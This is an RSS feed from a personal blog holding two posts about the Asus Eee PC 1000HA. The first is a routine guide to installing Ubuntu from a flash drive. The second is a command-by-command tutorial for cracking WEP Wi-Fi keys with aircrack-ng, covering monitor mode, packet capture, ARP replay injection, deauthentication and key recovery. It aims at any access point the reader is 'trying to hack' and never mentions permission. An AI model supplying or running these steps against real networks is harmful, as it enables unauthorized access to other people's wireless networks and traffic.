<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Scribute &#187; Asus eee</title>
	<atom:link href="http://scribute.com/category/asus-eee/feed/" rel="self" type="application/rss+xml" />
	<link>http://scribute.com</link>
	<description>Blog of Knowledge.</description>
	<lastBuildDate>Thu, 08 Jul 2010 16:54:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Install Ubuntu on Eee PC</title>
		<link>http://scribute.com/2009/03/install-ubuntu-on-eee-pc/</link>
		<comments>http://scribute.com/2009/03/install-ubuntu-on-eee-pc/#comments</comments>
		<pubDate>Tue, 31 Mar 2009 12:01:11 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Asus eee]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[asus]]></category>
		<category><![CDATA[eee]]></category>
		<category><![CDATA[netbook]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=139</guid>
		<description><![CDATA[The easiest way to install Ubuntu, or any distro at that, is to make a bootable flash drive to install from. From Linux or Windows you can download and install UNetbootin, which will automatically download Ubuntu and create a bootable flash drive. All you have to do is stick in a flash drive and select [...]]]></description>
			<content:encoded><![CDATA[<p>The easiest way to install Ubuntu, or any distro at that, is to make a bootable flash drive to install from. From Linux or Windows you can download and install <a href="http://unetbootin.sourceforge.net/">UNetbootin</a>, which will automatically download Ubuntu and create a bootable flash drive. All you have to do is stick in a flash drive and select the distro and version you want (in this case, obviously, Ubuntu 8.10). Do not choose the 8.10 net install&#8230;emphasis on NET&#8230;just choose the Live version.</p>
<p>Once UNetbootin finishes, open your USB drive and do the following:</p>
<p>Delete SYSLINUX.CFG:</p>
<pre>rm SYSLINUX.CFG</pre>
<p>Rename the ISOLINUX directory to SYSLINUX:</p>
<pre>mv ISOLINUX SYSLINUX</pre>
<p>Enter the SYSLINUX directory:</p>
<pre>cd SYSLINUX</pre>
<p>Rename ISOLINUX.CFG to SYSLINUX.CFG:</p>
<pre>mv ISOLINUX.CFG SYSLINUX.CFG</pre>
<p>Now you have a working Ubuntu Live Flash Drive!</p>
<p>Insert your new flash drive into one of the *right* USB ports of your Asus eee 1000HA. I say right because they have been a lot more reliable for me when booting from USB, but maybe that&#8217;s just me.</p>
<p>Boot up your eee and push esc when you see the boot screen. This should bring up the familiar Ubuntu Live screen where you can pick whether to start a Live session or go to the Installation. Installation is the obvious choice here. The Ubuntu Installation itself is past the scope of this wiki, but you can find help at <a href="http://ubuntu.com">ubuntu.com</a>.<br />
<span id="more-139"></span></p>
<p>Once you have finished the installation you may notice that your wireless NIC is not yet recognized. Don&#8217;t worry, we are about to fix that, and a lot more.</p>
<p>First, setup the array.org repository in your apt sources:</p>
<pre>wget http://www.array.org/ubuntu/array-intrepid.list (external link)
sudo mv -v array-intrepid.list /etc/apt/sources.list.d/</pre>
<p>Be sure to install the key for the repository:</p>
<pre>wget http://www.array.org/ubuntu/array-apt-key.asc (external link)
sudo apt-key add array-apt-key.asc</pre>
<p>Update your apt-cache:</p>
<pre>sudo apt-get update</pre>
<p>Install the kernel:</p>
<pre>sudo apt-get install linux-eeepc</pre>
<p>Now reboot. When your computer restarts, make sure you are now using the correct kernel by pressing esc when the grub information is displayed and select the kernel that ends in &#8220;-eeepc&#8221;</p>
<p>Now remove the original kernel:</p>
<pre>sudo apt-get remove linux-.*-generic</pre>
<p>You are now the proud owner of an Ubuntu based eee!</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/03/install-ubuntu-on-eee-pc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cracking WEP with eee PC 1000HA</title>
		<link>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/</link>
		<comments>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/#comments</comments>
		<pubDate>Sun, 11 Jan 2009 05:39:39 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Asus eee]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[1000ha]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[eee]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=20</guid>
		<description><![CDATA[The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over [...]]]></description>
			<content:encoded><![CDATA[<p>The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet. <del datetime="2010-07-04T15:45:20+00:00"><a href="http://www.andrewchapman.net/component/content/article/1-latestnews/25-bt3eeepc.html">Here</a> is the article I followed.</del> Apparently the article which I followed has been taken down, but a quick google search should find another.</p>
<p>After you have booted into BackTrack 3, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:</p>
<pre>ifconfig ath0 down</pre>
<p>Next we want to bring it back up, but in monitor mode:</p>
<pre>airmon-ng start wifi0</pre>
<p>You should see that a new interface called ath1 was created. That is the interface we are going to use for the rest of our cracking. Next:</p>
<pre>airodump-ng ath1</pre>
<p>This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don&#8217;t want to write thpre down, just open a new shell and leave that one open.</p>
<p>Now press
<pre>ctrl+c</pre>
<p> to stop airodump-ng. Open a new console (if you haven&#8217;t already) and type:<br />
<span id="more-20"></span></p>
<pre>airodump-ng --channel x --bssid y -w filename ath1</pre>
<p>Where x and y are the channel and bssid that you wrote down, respectively, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I&#8217;m searching through my cracked WEP files I know whats what.</p>
<p>Now leave that running and open another shell. Type</p>
<pre>ifconfig</pre>
<p>next to
<pre>ath1</pre>
<p> write down the first 6 sets of numbers in the long string next to HWaddr, replacing the dashes with colons (e.g. 00:11:22:33:44:55). That is your computer&#8217;s MAC address, whereas the bssid is the Access Point&#8217;s MAC address that you&#8217;re trying to hack.</p>
<p>Okay, now in the same window that you typed
<pre>ifconfig</pre>
<p>, type:</p>
<pre>aireplay-ng --arpreplay -b [Access Point's MAC] -h [Your MAC] ath1</pre>
<p>Now leave that running and open yet another shell, and type:</p>
<pre>aireplay-ng --deauth 5 -c [Your Mac] -a [Access Point's MAC] ath1</pre>
<p>Now in that same window type:</p>
<pre>aircrack-ng filename*.cap</pre>
<p>Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arrise.</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
